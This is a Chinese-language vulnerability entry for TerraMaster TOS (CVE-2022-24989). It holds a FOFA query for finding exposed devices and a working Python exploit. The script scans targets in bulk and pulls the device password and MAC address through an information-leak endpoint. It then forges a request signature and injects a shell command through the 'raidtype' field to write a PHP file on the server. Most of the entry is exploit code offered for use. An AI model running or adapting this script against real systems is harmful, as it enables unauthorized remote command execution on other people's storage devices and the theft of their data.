1.TerraMaster TOS 命令执行漏洞 CVE-2022-24989

1.1.漏洞描述

TerraMaster TOS 存在信息泄漏漏洞，攻击者通过漏洞可以获取服务器上的敏感信息，配合 CVE-2022-24989漏洞可以获取服务器权限

1.2.漏洞影响

TerraMaster TOS < 4.2.31

1.3.FOFA

“TerraMaster” && header=“TOS”

1.4.漏洞复现

登录界面如下：

复现效果：

1.5.poc

import time, requests,re,hashlib,json
def usage():
    print("""
    用法：python3 TerraMaster TOS 信息泄露漏洞+RCE.py
    前提：在脚本所在文件夹下放入：host.txt  目标
    
    """)
def poc_getinfo(target):
    print("[+]正则检测：{}".format(target))
    headers = {"User-Agent": "TNAS"}
    payload = target + "/module/api.php?mobile/webNasIPS"
    try:
        req = requests.get(url=payload, headers=headers).content.decode("utf-8")
        if "successful" in req:
            print("[+]存在信息泄露漏洞：{}".format(payload))
            print('    [-]泄露信息：' + req)
            with open("poc1_vul.txt", "a+", encoding="utf-8") as f:
                f.write(payload + '\n')
            poc_execute(req,target)
    except:
        pass
def poc_execute(req,target):
    print("[+]开始进行命令执行检测---")
    req = str(req)
    mac = str(re.findall(r"ADDR:(.*?)\\", req)[0][-6:])
    authorization = re.findall(r"PWD:(.*?)\\", req)[0]
    timestamp = str(int(time.time()))
    signature = hashlib.md5((mac + timestamp).encode("utf-8")).hexdigest()
    data = {"raidtype": ';echo "<?php phpinfo();?>">vuln.php', "diskstring": "XXXX"}
    headers = {"Authorization": authorization, "Signature": signature, "Timestamp": timestamp, "User-Agent": "TNAS"}
    payload = target+ '/module/api.php?mobile/createRaid'
    req2 = requests.post(url=payload,headers=headers,data=data).content.decode("utf-8")
    if "successful" in req2:
        print("[+]命令执行成功，成功写入phpinfo文件，文件地址：{}".format(target+'/module/vuln.php'))
if __name__ == '__main__':
    usage()
    with open("host.txt", 'r', encoding="utf-8") as f:
        temp = f.readlines()
    for target in temp:  # 此处也可以遍历url文件
        target = target.strip().rstrip("/")
        poc_getinfo(target)